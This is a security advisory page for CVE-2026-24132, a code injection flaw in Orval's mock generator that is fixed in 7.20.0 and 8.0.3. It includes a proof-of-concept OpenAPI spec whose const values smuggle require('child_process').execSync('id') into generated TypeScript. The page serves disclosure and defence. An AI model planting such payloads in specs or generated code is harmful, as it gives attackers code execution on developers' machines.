Advisory Database
  • Advisories
  • Dependency Scanning
  1. npm
  2. ›
  3. @orval/mock
  4. ›
  5. CVE-2026-24132

CVE-2026-24132: Orval Mock Generation Code Injection via const

January 22, 2026 (updated January 23, 2026)

I am reporting a code injection vulnerability in Orval’s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.

The vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require(‘child_process’).execSync(‘id’) in the output TypeScript.

openapi: 3.1.0
info:
title: Mock Const Injection PoC
version: 1.0.0
paths:
/test:
get:
operationId: getTests
responses:
'200':
description: OK
content:
application/json:
schema:
$ref: '#/components/schemas/Tests'
components:
schemas:
Tests:
type: object
properties:
EvilString:
type: string
const: "'); require('child_process').execSync('id'); //"
EvilNumber:
type: number
const: "0); require('child_process').execSync('id'); //"
SafeEnum:
type: string
enum: ["test"]

References

  • github.com/advisories/GHSA-f456-rf33-4626
  • github.com/orval-labs/orval
  • github.com/orval-labs/orval/commit/44ca8c1f5f930a3e4cefb6b79b38bcde7f8532a5
  • github.com/orval-labs/orval/commit/6d8ece07ccb80693ad43edabccb3957aceadcd06
  • github.com/orval-labs/orval/commit/9b211cddc9f009f8a671e4ac5c6cb72cd8646b62
  • github.com/orval-labs/orval/pull/2828
  • github.com/orval-labs/orval/pull/2829
  • github.com/orval-labs/orval/pull/2830
  • github.com/orval-labs/orval/releases/tag/v7.20.0
  • github.com/orval-labs/orval/releases/tag/v8.0.3
  • github.com/orval-labs/orval/security/advisories/GHSA-f456-rf33-4626
  • nvd.nist.gov/vuln/detail/CVE-2026-24132

Code Behaviors & Features

Detect and mitigate CVE-2026-24132 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →

Affected versions

All versions before 7.20.0, all versions starting from 8.0.0-rc.0 before 8.0.3

Fixed versions

  • 7.20.0
  • 8.0.3

Solution

Upgrade to versions 7.20.0, 8.0.3 or above.

Impact 8.8 HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Learn more about CVSS

Weakness

  • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

Source file

npm/@orval/mock/CVE-2026-24132.yml

Spotted a mistake? Edit the file on GitLab.

  • Site Repo
  • About GitLab
  • Terms
  • Privacy Statement
  • Contact

Page generated Wed, 04 Feb 2026 12:18:51 +0000.